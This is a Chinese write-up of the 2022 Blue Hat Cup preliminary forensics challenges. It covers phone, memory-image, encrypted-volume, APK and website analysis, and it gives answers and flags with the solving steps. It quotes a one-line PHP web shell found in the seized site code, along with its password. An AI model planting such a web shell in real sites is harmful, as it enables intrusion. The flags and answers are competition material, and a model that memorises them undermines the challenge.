2022蓝帽杯初赛电子取证

手机取证 

1. 627604C2-C586-48C1-AA16-FF33C3022159.PNG图片的分辨率是？[答案格式：19201080]

360360

直接搜索-表格视图

 2. 姜总的快递单号是多少？[答案格式：QA1234567890]

SF1142358694796

计算机取证

1. 从内存镜像中获得开机密码是多少？

anxinqi

内存镜像是1.dmp

2. 制作该内存镜像的进程Pid号是多少？[答案格式：1024]

2192

MagnetRAMCaptu是内存镜像取证工具 

3. bitlokcer分区某office文件中存在flag？[答案格式：flag{abCd1234}]

flag{b27867b66866866686866883bb43536}

工具集-内存镜像取证工具-在1.dmp中搜索bitlocker密钥

生成密钥文件后，bitlocker解密，发现里面有加密文件，需要密码

txt文档里面有一个密码本，根据密码本爆破得到密码287fuweiuhfiute，只读能打开

4. Tc加密存在flag是什么？[答案格式：flag{abCd1234}]

flag{1349934913913991394cacacacacacc} 

wp：2022蓝帽杯初赛取证部分wp（详细）_DrN0rman的博客-CSDN博客_蓝帽杯题目

加密的文档中还有我天.docx和新建文本文档.txt，新建文本文档.txt20MB大的很奇怪，猜测是被truecrypt加密的对象，改后缀为.hc，用取证大师加载后解密，密钥来自工具集-内存镜像取证工具，在1.dmp中能搜到truecrypt密钥

解密后得到一个加密的哈哈哈.zip，爆破得密码991314，解压得flag

程序分析

1. 程序包名是？[答案格式：abv.va.as]

exec.azj.kny.d.c

2. 程序的入口是？[答案格式：asd.xda.asd.ca] 

minmtta.hemjcbm.ahibyws.MainActivity

雷电APP解析上三个android:name都显示了，反编译后感觉最前面的是

3. 程序的服务器地址的密文是？[答案格式：asdqwewe]

aHR0cHM6Ly9hbnNqay5lY3hlaW8ueHl6

在上题的程序入口中看到一段密文

解密后看到网址

4. 程序实现安全检测的类的名称是？[答案格式：cla]

a

直接搜索安全，双击函数名a()，显示类a

网站取证

据了解，某网上商城系一团伙日常资金往来用，从2022年4月1日起使用虚拟币GG币进行交易，现已获得该网站的源代码以及部分数据库备份文件，请您对以下问题进行分析解答。

1.请从网站源码中找出木马文件，并提交木马连接的密码。（答案参考格式：abcABC123）

lanmaobei666

用火绒对文件进行查杀可以找到木马0f71e181346d43e56722aec663e5d4e9.php

打开后可以看到密码 

<?php assert(@$_POST['lanmaobei666']); ?>

2. 请提交数据库连接明文密码。[答案格式：Abc123]

KBLT123

wp参考官方wp

查看数据库配置文件/application/database.php

<?php
function my_encrypt(){
    $str = 'P3LMJ4uCbkFJ/RarywrCvA==';
    $str = str_replace(array("/r/n", "/r", "/n"), "", $str);
    $key = 'PanGuShi';
    $iv = substr(sha1($key),0,16);
    $td = mcrypt_module_open(MCRYPT_RIJNDAEL_128,"",MCRYPT_MODE_CBC,"");
    mcrypt_generic_init($td, "PanGuShi", $iv);
    $decode = base64_decode($str);
    $dencrypted = mdecrypt_generic($td, $decode);
    mcrypt_generic_deinit($td);
    mcrypt_module_close($td);
    $dencrypted = trim($dencrypted);
    return $dencrypted;
}

PHP5.4可以运行，感谢wzx

3.请提交数据库金额加密混淆使用的盐值。[答案格式：Abc123]

jyzg123456

查看bak.sql发现tab_channel_order_list和money有关，应该是用来存储金额的

在www文件夹中查找tab_channel_order_list，找到盐值

4.请计算张宝2022-04-02 00:00:00-2022-04-18 23:59:59累计转账给王子豪多少RMB？[答案格式：123.66

15758353.76